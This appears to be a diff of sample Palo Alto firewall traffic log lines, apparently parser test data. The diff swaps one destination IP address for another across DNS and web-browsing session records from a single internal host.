04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:27 1,2012/10/30 
09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 
Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 
04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9 Oct 30 09:46:37 1,2012/10/30 
09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 
04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 